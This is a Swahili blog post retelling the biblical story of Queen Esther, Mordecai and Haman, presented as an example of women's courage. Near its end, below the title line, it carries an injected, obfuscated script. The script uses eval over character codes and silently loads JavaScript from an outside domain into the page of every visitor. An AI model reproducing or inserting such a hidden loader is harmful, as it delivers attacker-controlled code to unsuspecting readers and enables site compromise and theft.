Vitabu vingi vya dini na kihistoria havijamuelezea sana mwanamke na matukio yake, ushujaa na mengineyo mambo haya yalipuuzwa na waandishi wengi wa kipindi cha zamani, nadhani hii ndo sababu ya watu wengi kudhani kuwa wanawake hawawezi fanya mambo makubwa. Lakini uhalisia ni kwamba wanawake wanaweza fanya mambo makubwa mengi tu, Leo nimekuletea mwanamke aliye wahi kuitikisa dunia kwa tukio kubwa.
Esta, Huyu alikuwa mwanamke wa kiyahudi ambaye alikuwa malkia wa nchi ya Ajemi ambapo wazazi wa mwanamke huyo walikufa wakati alipokuwa mtoto mdogo sana, Mordekai akamlea. A·has·ueʹro, mfalme wa Ajemi, alikuwa na jumba la kifalme mjini Shuʹshani, na Mordekai alikuwa ni mmoja wa watumishi wake. Basi, siku moja Vashʹti aliyekuwa mke mkubwa wa mfalme alikataa kumtii, hivyo mfalme anachagua mke mwingine awe malkia wake Bahati inamuangukia Esta msichana mrembo.
Hamani moja kiongozi wa kiajemi alikasirika kwa sababu alipenda wayahudi wawe chini yake hivyo akapanga awauwe wote.
Hamani alikuwa na cheo cha juu katika Ajemi ambapo alitaka Mordekai amwinamie pia. Lakini Mordekai anakataa kwa kuwa aliona haifai kumwinamia mtu huyo mbaya, hali iliyomkasirisha sana Hamani na kupelekea afanye hivi;
Kumbe watu wenye fitna wapo kitambooo, Hamani alimwambia mfalme uongo juu ya Waisraeli. âNi watu wabaya wasiotii sheria zako,â alisema. âHawa Wanapaswa kuuawa.â Muda huo mfalme A·has·ueʹro hana habari kwamba Esta mkewe ni Mwisraeli. Basi mfalme alimsikiliza Hamani, na kuagiza sheria itungwe Waisraeli wauawe wote.
Mordekai alapopata habari ya sheria hiyo, aliona vibaya na hatari sana kwa wayahudi. Aliamua kumpelekea Esta ujumbe huu: âLazima umwambie mfalme, na kumwomba atuokoe.â kipindi hicho ilikuwa ni kinyume cha sheria katika Ajemi kumwona mfalme bila kuitwa. Lakini kutokana na umuhimu wa suala lake Esta akajiseme Liwalo na Liwe akaamua kuingia bila kuitwa.Ila kwa sababu Mfalme alimpenda sana Esta akaamua amnyoshe fimbo yake ya dhahabu ili kuondosha adhabu kwa kipenzi chake maana yake angechinjwa bila kufanya hivyo. Mfalme akamwambia sema chochote kipenzi hata nusu ya ufalme wangu nitkupa ukihitaji basi Esta akasema naomba muje na Hamani nimeandaa karamu. Wakiwa huko mfalme akamuuliza tena Esta unachotaka ni nini nikupe. Esta akasema atamwambia mfalme ikiwa yeye na Hamani watakuja kwenye karamu nyingine kesho yake.
Siku ikafika karamu ikaandaliwa vyema na esta mwenyewe Katika karamu hiyo Esta akamwambia mfalme hivi: âWatu wangu na mimi tutauawa.â Mfalme akakasirika Akauliza kwa ghadhabu âNani anathubutu kufanya hivyo?â Esta akavuta pumzi kisha akajibu âMtu huyo ni adui yangu mtesi Hamani mbaya!â
Habari hizi zilimfanya mfalme akasirike kweli kweli Akaamuru Hamani auawe mara moja Kisha, mfalme akampa Mordekai cheo cha pili katika mamlaka. Ndipo Mordekai akahakikisha sheria mpya inatungwa kuruhusu Waisraeli wapiganie uhai wao siku ambayo wangetakiwa kuuawa. Kutokama na hilo waisraeli wakasaidika kutokana na hilo wayahudi wanamkumbuka Esta kwa kuokoa kizazi chao kisipotee.
Wapo wanawake wengi waliyofanya makubwa ikiwemo cleoptra wa misri, monalisa, Samia Suluhu na wengineo wengi sana, hivyo basi pambana tu utafanikiwa mwanamke
Esta, Mwanamke Aliyetikisa Dunia na Hekima yake
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments